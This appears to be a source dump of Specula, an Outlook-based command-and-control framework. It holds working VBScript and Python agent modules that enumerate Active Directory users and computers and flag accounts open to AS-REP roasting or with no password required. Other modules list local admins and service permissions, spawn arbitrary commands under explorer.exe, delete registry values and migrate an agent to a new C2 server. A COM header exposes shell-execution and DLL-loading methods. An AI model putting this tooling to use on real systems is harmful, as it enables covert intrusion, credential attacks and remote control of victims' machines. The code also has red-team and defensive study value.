MIIDBzCCAe+gAwIBAgIJAINGOZrDXvI2MA0GCSqGSIb3DQEBCwUAMCcxJTAjBgNV 3 | BAMMHGlwLTE3Mi0zMS04MC0zNS5lYzIuaW50ZXJuYWwwHhcNMjAwNTEyMDkzMzAw 4 | WhcNMzAwNTEwMDkzMzAwWjAnMSUwIwYDVQQDDBxpcC0xNzItMzEtODAtMzUuZWMy 5 | LmludGVybmFsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr5htMoRH 6 | u3XzftnuuPyrzs9c39zRyuNPsvf91c6HlNXSB9zprVZ2fHj9axS/WpOErlj+PHIT 7 | SpFaQqW8q5Pdb0fvlXGxC56SKf+08YiHZo8otsK7N2NYXSxLjpQZ9MTpeVxqFH6F 8 | 3NDedPV3oYxXI9q8+ZfFiRQPUnulmj4DspVYno49z1hSjcOBYoP3FVpTjldUWigm 9 | mTzr/udYufwIgMDGECCr8ZKIAhrCACLYNH8HrY9w2QtDETkdnhcK9EmazYCH9tRV 10 | nTCQSNhnu5kS2VLw39+cziVFt8XgsRQPpVfBTvGFRuts5wX82Gv8HMlrvcR3PHph 11 | LTE3j+qE4OsA+QIDAQABozYwNDAJBgNVHRMEAjAAMCcGA1UdEQQgMB6CHGlwLTE3 12 | Mi0zMS04MC0zNS5lYzIuaW50ZXJuYWwwDQYJKoZIhvcNAQELBQADggEBAKfPxE2n 13 | tax6bUvxNUIMJzbgmjNSxIzuqpnobc2CFx9NqEd9TMZ+x2Hgk+nnboOb+W6KYG7h 14 | RNFdNeb/MVDt3qieqsW6Ud2yqeW+2k9ZwrhwBIFsZP4NbjevShYk78WCu/gtM+Wt 15 | +0frvciSnYklFFtadoWuUPjQbETgsjvxjB6O+lLXQyPgARp2ZvgKLdNybslSPOHf 16 | h//Tg4nBcUwthFlsUFxVpg2aoopFwLfm4sgcC5fWAfK7sa3qHK6z8WPFoK+xyzbb 17 | CnAMMsXwBv6+K2abHx+LhNYr3+lMgfO6zyK0b4gLemOdtcC730cO7hK/7ByG4xuJ 18 | ZWTkYNIoVy3/BOU= 19 | -----END CERTIFICATE----- 20 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_computer.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates the computer specified in the samaccountName option. 11 | If computer account is found it also enumerates the properties of the account. 12 | If account not found it will say so in the returned data. 13 | 14 | Remember to specify with $ in the end. 15 | Like: set samaccountname dc1$ 16 | 17 | It uses WbemScripting.SWbemLocator 18 | - ConnectServer(\\root\\directory\\LDAP) 19 | - Query: SELECT * FROM ds_computer Where DS_sAMAccountName = VARIABLE 20 | """ 21 | self.entry = 'list_computer' 22 | self.depends = [] 23 | self.options['samaccountname'] = { 24 | "value": None, 25 | "required": True, 26 | "description": "samaccountname to retreive information for", 27 | "handler": quotedstring 28 | } 29 | super().__init__(templatepath) 30 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_whoami.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Whoami with limited information. Missing privileges since there is no way to get 10 | that without API access or running external binaries 11 | 12 | It uses CreateObject("Wscript.Shell") 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(root\directory\LDAP) 15 | - Query: "SELECT DS_memberOf FROM ds_user Where DS_sAMAccountName = '" & strUsername & "'" 16 | 17 | - ConnectServer(root\cimv2) 18 | - Query: "SELECT * FROM Win32_UserProfile Where SID='" & strSID & "'" 19 | """ 20 | self.entry = 'list_whoami' 21 | self.depends = [] 22 | super().__init__(templatepath) 23 | 24 | def rethandler(self, agent, options, data): 25 | for line in data.split("\n"): 26 | if line.startswith("SID:"): 27 | sid = line.split()[1] 28 | if sid: 29 | agent.sid = sid -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_addcomputertodomain.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates ms-DS-MachineAccountQuota from LDAP and finds the SeMachineAccountPrivilege in the default domain controller policy 11 | under the static path (GUID is always static for the default domain controller policy): 12 | \\\\domain.com\\Sysvol\\domain.com\\Policies\\{6AC1786C-016F-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf 13 | 14 | It uses WbemScripting.SWbemLocator 15 | - ConnectServer(\\root\\directory\\LDAP) 16 | - Query: SELECT DS_ms_DS_MachineAccountQuota FROM ds_domaindns 17 | 18 | It uses Wscript.Shell 19 | - ExpandEnvironmentStrings 20 | 21 | It uses Scripting.FileSystemObject 22 | - OpenTextFile 23 | - OpenTextFile().readline 24 | - FileExists 25 | """ 26 | self.entry = 'list_addcomputertodomain' 27 | self.depends = [] 28 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/enumerate/ldap/ldap_query.txt: -------------------------------------------------------------------------------- 1 | Function ldap_query() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & {{query}} & vbCrLf 7 | Set colItems = objWMIService.ExecQuery({{query}}) 8 | For Each PATH in colItems 9 | For Each pathAttribute in PATH.Properties_ 10 | Select Case TypeName(pathAttribute.value) 11 | case "String" 12 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 13 | case "Long" 14 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 15 | case "Boolean" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "SWbemObjectEx" 18 | 'Cannot get this work... 19 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 20 | case "Variant()" 21 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 22 | End Select 23 | Next 24 | Returndata = Returndata & vbCrLf 25 | Next 26 | 27 | ldap_query = Returndata 28 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_localadmins.txt: -------------------------------------------------------------------------------- 1 | Function list_localadmins() 2 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 3 | Set objWMIService = objLocator.ConnectServer({{host}}, "root\cimv2") 4 | Set colItems1 = objWMIService.ExecQuery( "Select * from Win32_ComputerSystem") 5 | For each objItem in colItems1 6 | MachineName = objItem.Name 7 | Next 8 | 9 | toreturn = toreturn & "Administrators Group Membership on Machine : " & MachineName & vbCrLf 10 | toreturn = toreturn & "-----Group Members------" & vbCrLf 11 | Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_GroupUser WHERE GroupComponent=""Win32_Group.Domain='" & MachineName & "',Name='Administrators'""") 12 | 13 | For Each Path In colItems2 14 | NamesArray = Split(Path.PartComponent,",") 15 | strMemberName = Replace(Replace(NamesArray(1),Chr(34),""),"Name=","") 16 | DomainNameArray = Split(NamesArray(0),"=") 17 | strDomainName = Replace(DomainNameArray(1),Chr(34),"") 18 | If strDomainName <> strComputerName Then 19 | strMemberName = strDomainName & "\" & strMemberName 20 | End If 21 | toreturn = toreturn & strMemberName & vbCrLf 22 | Next 23 | 24 | list_localadmins = toreturn & vbCrLf 25 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_iprouting.txt: -------------------------------------------------------------------------------- 1 | Function list_iprouting() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2") 5 | Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_IP4RouteTable",,48) 6 | 7 | list_iprouting = "----- DYNAMIC ROUTES -----" & vbCrlf 8 | For Each objItem in colItems 9 | list_iprouting = list_iprouting & "Description: " & objItem.Description & vbCrlf 10 | list_iprouting = list_iprouting & "Interface Index: " & objItem.InterfaceIndex & vbCrlf 11 | list_iprouting = list_iprouting & "Metric: " & objItem.Metric1 & vbCrlf 12 | list_iprouting = list_iprouting & "Protocol: " & objItem.Protocol & vbCrlf & vbCrlf 13 | Next 14 | 15 | list_iprouting = list_iprouting & "----- PERSISTENT ROUTES -----" & vbCrlf 16 | Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_IP4PersistedRouteTable",,48) 17 | For Each objItem in colItems2 18 | list_iprouting = list_iprouting & "Description: " & objItem.Description & vbCrlf 19 | list_iprouting = list_iprouting & "Metric: " & objItem.Metric1 & vbCrlf 20 | Next 21 | End Function -------------------------------------------------------------------------------- /helperFunctions/HexToBytes.txt: -------------------------------------------------------------------------------- 1 | Function HexToBytes(HexString)' As Byte() 2 | Dim Bytes()' As Byte 3 | Dim HexPos' As Integer 4 | Dim HexDigit' As Integer 5 | Dim BytePos' As Integer 6 | Dim Digits' As Integer 7 | 8 | ReDim Bytes(Len(HexString) \ 2) 'Initial estimate. 9 | For HexPos = 1 To Len(HexString) 10 | HexDigit = InStr("0123456789ABCDEF", UCase(Mid(HexString, HexPos, 1))) - 1 11 | If HexDigit >= 0 Then 12 | If BytePos > UBound(Bytes) Then 13 | 'Add some room, we'll add room for 4 more to decrease 14 | 'how often we end up doing this expensive step: 15 | ReDim Preserve Bytes(UBound(Bytes) + 4) 16 | End If 17 | Bytes(BytePos) = Bytes(BytePos) * &H10 + HexDigit 18 | Digits = Digits + 1 19 | End If 20 | If Digits = 2 Or HexDigit < 0 Then 21 | If Digits > 0 Then BytePos = BytePos + 1 22 | Digits = 0 23 | End If 24 | Next 25 | If Digits = 0 Then BytePos = BytePos - 1 26 | If BytePos < 0 Then 27 | Bytes = "" 'Empty. 28 | Else 29 | ReDim Preserve Bytes(BytePos) 30 | End If 31 | 'Wscript.Echo (Bytes)) 32 | HexToBytes = Bytes 33 | End Function 34 | 35 | 36 | -------------------------------------------------------------------------------- /functions/execute/host/spawnproc_explorer.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Spawns/Executes the specified process/command under explorer.exe. 11 | Example: 12 | set command c:\\tools\\autoruns.exe 13 | set arguments -e 14 | run 15 | 16 | It uses Shell.Application 17 | - Windows.app.item() 18 | - Windows.app.item().Document.Application.ShellExecute 19 | """ 20 | self.entry = 'Spawn_Explorer' 21 | self.depends = [] 22 | self.options['command'] = { 23 | "value": None, 24 | "required": True, 25 | "description": "Command to execute on remote target", 26 | "handler": quotedstring 27 | } 28 | self.options['arguments'] = { 29 | "value": "\"\"", 30 | "required": True, 31 | "description": "Arguments to pass to command. Default is no arguments", 32 | "handler": quotedstring 33 | } 34 | super().__init__(templatepath) 35 | -------------------------------------------------------------------------------- /functions/operation/outlook/list_notifications.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Lists out current notification settings. 11 | If you get all failed in the agent log it means that it is set to default (Notifications,sounds and toasts are on) 12 | 13 | It uses WbemScripting.SWbemNamedValueSet 14 | - Add 15 | - Add.__ProviderArchitecture 16 | 17 | It uses WbemScripting.SWbemLocator 18 | - ConnectServer(root\cimv2) 19 | - ConnectServer(root\cimv2).EnumValues 20 | - ConnectServer(root\cimv2).GetDwordValue 21 | - ConnectServer(root\cimv2).GetStringValue 22 | - ConnectServer(root\cimv2).GetExpandedStringValue 23 | - ConnectServer(root\cimv2).GetBinaryValue 24 | - ConnectServer(root\cimv2).GetMultiStringValue 25 | - ConnectServer(root\cimv2).GetQWORDValue 26 | """ 27 | self.entry = 'list_notifications' 28 | self.depends = ['./helperFunctions/Getregvalue.txt'] 29 | 30 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/operation/registry/delvaluehkcuregistry.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module deletes registry key in the HKCU hive specified in the PathToKey option recursivly. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - ConnectServer(root\cimv2).DeleteValue 14 | """ 15 | self.entry = 'DelValue_HKCU_Registry' 16 | self.depends = ['./helperFunctions/Delregvalue_hkcu.txt'] 17 | self.options['PathToKey'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "Path to the key you were the value is located. Example: Software\\EvilCorp\\subkey", 21 | "handler": quotedstring 22 | } 23 | self.options['Valuename'] = { 24 | "value": None, 25 | "required": True, 26 | "description": "Valuename to the value you would like to delete. Example: URL", 27 | "handler": quotedstring 28 | } 29 | super().__init__(templatepath) 30 | -------------------------------------------------------------------------------- /api/SpeculaApi/Sepcula.h: -------------------------------------------------------------------------------- 1 | // Sepcula.h : Declaration of the CSepcula 2 | 3 | #pragma once 4 | #include "resource.h" // main symbols 5 | 6 | 7 | 8 | #include "SpeculaApi_i.h" 9 | 10 | 11 | 12 | using namespace ATL; 13 | 14 | 15 | // CSepcula 16 | 17 | class ATL_NO_VTABLE CSepcula : 18 | public CComObjectRootEx, 19 | public CComCoClass, 20 | public IDispatchImpl 21 | { 22 | public: 23 | CSepcula() 24 | { 25 | } 26 | 27 | DECLARE_REGISTRY_RESOURCEID(IDR_SEPCULA) 28 | 29 | 30 | BEGIN_COM_MAP(CSepcula) 31 | COM_INTERFACE_ENTRY(ISepcula) 32 | COM_INTERFACE_ENTRY(IDispatch) 33 | END_COM_MAP() 34 | 35 | 36 | 37 | DECLARE_PROTECT_FINAL_CONSTRUCT() 38 | 39 | HRESULT FinalConstruct() 40 | { 41 | return S_OK; 42 | } 43 | 44 | void FinalRelease() 45 | { 46 | } 47 | 48 | public: 49 | STDMETHOD(RunShell)(BSTR cmd, VARIANT timeout, BSTR * result); 50 | STDMETHOD(LoadDll)(BSTR path, boolean persist, boolean* status); 51 | 52 | 53 | private: 54 | CComBSTR CmdProg{L"C:\\Windows\\system32\\cmd.exe /c "}; 55 | 56 | 57 | 58 | }; 59 | 60 | OBJECT_ENTRY_AUTO(__uuidof(Sepcula), CSepcula) 61 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_servicepermissions.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the services and the permissions on the host. 10 | 11 | It lists out: 12 | - Service Name 13 | - Service Binary path 14 | - Group name and Access 15 | 16 | Example Output: 17 | Enumerating Permissions for: UserDataSvc_3dc16 18 | C:\Windows\system32\svchost.exe 19 | GROUP: NT SERVICE\TRUSTEDINSTALLER 20 | binPath: C:\Windows\system32\svchost.exe 21 | Sanity Check - Access Mask Value To Match: 2032127 22 | ACE Type: Allow 23 | Access Mask (Decimal): 2032127 (FullControl) 24 | 25 | It uses WbemScripting.SWbemLocator 26 | - ConnectServer(root\cimv2) 27 | - Query: Select * from Win32_Service 28 | - Query: Select * from win32_logicalFileSecuritySetting WHERE Path=VARIABLE 29 | """ 30 | self.entry = 'list_servicepermissions' 31 | self.depends = [] 32 | super().__init__(templatepath) 33 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_installeddotnet.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the installed .NET versions. 10 | Based on MS documentation: 11 | https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed 12 | 13 | Lists the installed versions 14 | 15 | It uses WbemScripting.SWbemNamedValueSet 16 | - Add 17 | - Add.__ProviderArchitecture 18 | 19 | It uses WbemScripting.SWbemLocator 20 | - ConnectServer(root\cimv2) 21 | - ConnectServer(root\cimv2).EnumValues 22 | - ConnectServer(root\cimv2).GetDwordValue 23 | - ConnectServer(root\cimv2).GetStringValue 24 | - ConnectServer(root\cimv2).GetExpandedStringValue 25 | - ConnectServer(root\cimv2).GetBinaryValue 26 | - ConnectServer(root\cimv2).GetMultiStringValue 27 | - ConnectServer(root\cimv2).GetQWORDValue 28 | """ 29 | self.entry = 'list_installeddotnet' 30 | self.depends = ['./helperFunctions/Getregvalue.txt'] 31 | super().__init__(templatepath) 32 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_domaininfo.txt: -------------------------------------------------------------------------------- 1 | Function list_domaininfo() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: SELECT * FROM ds_domaindns" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_domaindns") 8 | For Each PATH in colItems 9 | For Each pathAttribute in PATH.Properties_ 10 | Select Case TypeName(pathAttribute.value) 11 | case "String" 12 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 13 | case "Long" 14 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 15 | case "Boolean" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "SWbemObjectEx" 18 | 'Cannot get this work... 19 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 20 | case "Variant()" 21 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 22 | End Select 23 | Next 24 | Returndata = Returndata & vbCrLf 25 | Next 26 | 27 | list_domaininfo = Returndata 28 | End Function -------------------------------------------------------------------------------- /functions/execute/host/migrate_homepage.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Migrate agent to another Specula server. 11 | This module sets the URL to a new Specula server. 12 | Useful in situations when you want to change host. 13 | It does NOT move the encrytion key so you must point to the validation url. 14 | !!Remember to have the other server up and running!! 15 | 16 | It uses WbemScripting.SWbemLocator 17 | - ConnectServer(root\cimv2) 18 | - ConnectServer(root\cimv2).CreateKey 19 | - ConnectServer(root\cimv2).SetStringValue 20 | - ConnectServer(root\cimv2).SetDWORDValue 21 | """ 22 | self.entry = 'Execute_MigrateHomepage' 23 | self.depends = ['./helperFunctions/Setregvalue_hkcu.txt'] 24 | self.options['homepageurl'] = { 25 | "value": None, 26 | "required": True, 27 | "description": "URL to new Specula Homepage validation", 28 | "handler": quotedstring 29 | } 30 | super().__init__(templatepath) 31 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_users.txt: -------------------------------------------------------------------------------- 1 | Function list_users() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT DS_sAMAccountName FROM ds_user" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT DS_sAMAccountName FROM ds_user") 8 | For Each PATH in colItems 9 | For Each pathAttribute in PATH.Properties_ 10 | Select Case TypeName(pathAttribute.value) 11 | case "String" 12 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 13 | case "Long" 14 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 15 | case "Boolean" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "SWbemObjectEx" 18 | 'Cannot get this work... 19 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 20 | case "Variant()" 21 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 22 | End Select 23 | Next 24 | Returndata = Returndata & vbCrLf 25 | Next 26 | 27 | list_users = Returndata 28 | End Function -------------------------------------------------------------------------------- /functions/operation/specula/set_allowlongscriptruntime.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | import uuid 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | This module sets necessary registry keys to allow long running scripts such as list_dir running recurse or service acl enumeration. 11 | 12 | The following value changes the default timeout for scripts running in Outlook and is being set with this module: 13 | reg add "HKCU\Software\Microsoft\Internet Explorer\Styles" /v "MaxScriptStatements" /t REG_DWORD /d 0xFFFFFFFF /f 14 | 15 | ! After setting this key, Outlook needs to be restarted for it to take effect ! 16 | 17 | It uses WbemScripting.SWbemNamedValueSet 18 | - Add.__ProviderArchitecture 19 | 20 | It uses WbemScripting.SWbemLocator 21 | ConnectServer(root\cimv2) 22 | ConnectServer(root\cimv2).CreateKey 23 | ConnectServer(root\cimv2).SetDWORDValue 24 | """ 25 | self.entry = 'AllowLongScriptRuntime' 26 | self.depends = ['./helperFunctions/Setregvalue_hkcu.txt'] 27 | 28 | super().__init__(templatepath) 29 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_localusers.txt: -------------------------------------------------------------------------------- 1 | Function list_localusers() 2 | on error resume next 3 | Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell") 4 | compname = sh.ExpandEnvironmentStrings("%COMPUTERNAME%") 5 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 6 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 7 | 8 | toreturn = toreturn & "Local users on Machine " & compname & " : " & vbCrLf 9 | Set colUsers = objWMIService.ExecQuery("SELECT * FROM Win32_UserAccount WHERE LocalAccount = True") 10 | For Each objUser in colUsers 11 | toreturn = toreturn & objUser.Name & vbCrLf 12 | toreturn = toreturn & "--Description: " & objUser.Description & vbCrLf 13 | toreturn = toreturn & "--Disabled: " & objUser.Disabled & vbCrLf 14 | toreturn = toreturn & "--FullName: " & objUser.FullName & vbCrLf 15 | toreturn = toreturn & "--Lockout: " & objUser.Lockout & vbCrLf 16 | toreturn = toreturn & "--PasswordChangeable: " & objUser.PasswordChangeable & vbCrLf 17 | toreturn = toreturn & "--PasswordExpires: " & objUser.PasswordExpires & vbCrLf 18 | toreturn = toreturn & "--PasswordRequired: " & objUser.PasswordRequired & vbCrLf 19 | toreturn = toreturn & vbCrLf 20 | Next 21 | list_localusers = toreturn 22 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_asreproast.txt: -------------------------------------------------------------------------------- 1 | Function list_asreproast() 2 | On error resume next 3 | 4 | Const DONT_REQUIRE_PREAUTH = 4194304 5 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 6 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 7 | 8 | Returndata = Returndata & "Running query: " & "SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304" & vbCrLf 9 | Set colItems = objWMIService.ExecQuery("SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304") 10 | For Each PATH in colItems 11 | For Each pathAttribute in PATH.Properties_ 12 | Select Case TypeName(pathAttribute.value) 13 | case "Long" 14 | if DONT_REQUIRE_PREAUTH and pathAttribute.value Then 15 | Returndata = Returndata & PATH.ADSIPath & vbCrLf 16 | Returndata = Returndata & "Samaccountname: " & PATH.DS_samaccountname & vbCrLf 17 | Returndata = Returndata & "DONT_REQUIRE_PREAUTH enabled" & vbCrLf 18 | Returndata = Returndata & "UserAccountControl set to: " & PATH.DS_userAccountControl & vbCrLf 19 | Returndata = Returndata & vbCrLf 20 | end if 21 | End Select 22 | Next 23 | Next 24 | list_asreproast = Returndata 25 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_passwordnotrequired.txt: -------------------------------------------------------------------------------- 1 | Function list_passwordnotrequired() 2 | On error resume next 3 | 4 | Const PASSWD_NOTREQD = 32 5 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 6 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 7 | 8 | Returndata = Returndata & "Running query: " & "SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 32" & vbCrLf 9 | Set colItems = objWMIService.ExecQuery("SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 32") 10 | For Each PATH in colItems 11 | For Each pathAttribute in PATH.Properties_ 12 | Select Case TypeName(pathAttribute.value) 13 | case "Long" 14 | if PASSWD_NOTREQD and pathAttribute.value Then 15 | Returndata = Returndata & PATH.ADSIPath & vbCrLf 16 | Returndata = Returndata & "Samaccountname: " & PATH.DS_samaccountname & vbCrLf 17 | Returndata = Returndata & "PASSWD_NOTREQD enabled" & vbCrLf 18 | Returndata = Returndata & "UserAccountControl set to: " & PATH.DS_userAccountControl & vbCrLf 19 | Returndata = Returndata & vbCrLf 20 | end if 21 | End Select 22 | Next 23 | Next 24 | list_passwordnotrequired = Returndata 25 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_computers.txt: -------------------------------------------------------------------------------- 1 | Function list_computers() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT DS_sAMAccountName FROM ds_computer" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT DS_sAMAccountName FROM ds_computer") 8 | For Each PATH in colItems 9 | For Each pathAttribute in PATH.Properties_ 10 | Select Case TypeName(pathAttribute.value) 11 | case "String" 12 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 13 | case "Long" 14 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 15 | case "Boolean" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "SWbemObjectEx" 18 | 'Cannot get this work... 19 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 20 | case "Variant()" 21 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 22 | End Select 23 | Next 24 | Returndata = Returndata & vbCrLf 25 | Next 26 | 27 | list_computers = Returndata 28 | End Function -------------------------------------------------------------------------------- /functions/api/remove_api.txt: -------------------------------------------------------------------------------- 1 | 2 | Function remove_api() 3 | On error resume next 4 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 5 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 6 | basepath = "software\classes\" 7 | 8 | regdelres = DelRegKey_HKCU(basepath + "OutLookHelper.Sysinfo") & vbCrlf 9 | regdelres = regdelres & DelRegKey_HKCU(basepath + "SpeculaApi.Specula.1") & vbCrlf 10 | regdelres = regdelres & DelRegKey_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}") & vbCrlf 11 | regdelres = regdelres & DelRegKey_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}") & vbCrlf 12 | regdelres = regdelres & DelRegKey_HKCU(basepath + "Interface\{e8b55279-c6b4-48f3-8138-b727337c0236}") & vbCrlf 13 | 14 | if {{deletedlls}} = True Then 15 | 16 | If fs.FileExists({{dll}}) = True Then 17 | fs.DeleteFile {{dll}} 18 | else 19 | End If 20 | 21 | If fs.FileExists({{dll}}) = True Then 22 | filedelres = filedelres & "Delete file: " & {{dll}} & " - Fail" & vbCrlf 23 | else 24 | filedelres = filedelres & "Delete file: " & {{dll}} & " - Success!" & vbCrlf 25 | End If 26 | remove_api = regdelres & filedelres 27 | else 28 | remove_api = regdelres 29 | End if 30 | 31 | 32 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_recyclebin.txt: -------------------------------------------------------------------------------- 1 | Function list_recyclebin() 2 | On error resume next 3 | Set sa = window.external.OutlookApplication.CreateObject("Shell.Application") 4 | Set items = sa.Namespace(10).Items() 5 | output = "Name - MB - FullPath" & vbCrLF 6 | sizeround = 1048576 7 | x = 0 8 | Do until x = items.count 9 | friendlysize = Round(items.item(x).size / sizeround, 1) 10 | output = output & items.item(x).name & " - " & friendlysize & " - " & items.item(x).path & vbCrLF 11 | x=x+1 12 | Loop 13 | 14 | ml1 = 0 15 | ml2 = 0 16 | ml3 = 0 17 | 18 | lines=split(output,vbcrlf) 19 | for each line in lines 20 | parts = Split(line, " - ") 21 | If Len(parts(0)) > ml1 Then 22 | ml1 = Len(parts(0)) 23 | End If 24 | If Len(parts(1)) > ml2 Then 25 | ml2 = Len(parts(1)) 26 | End If 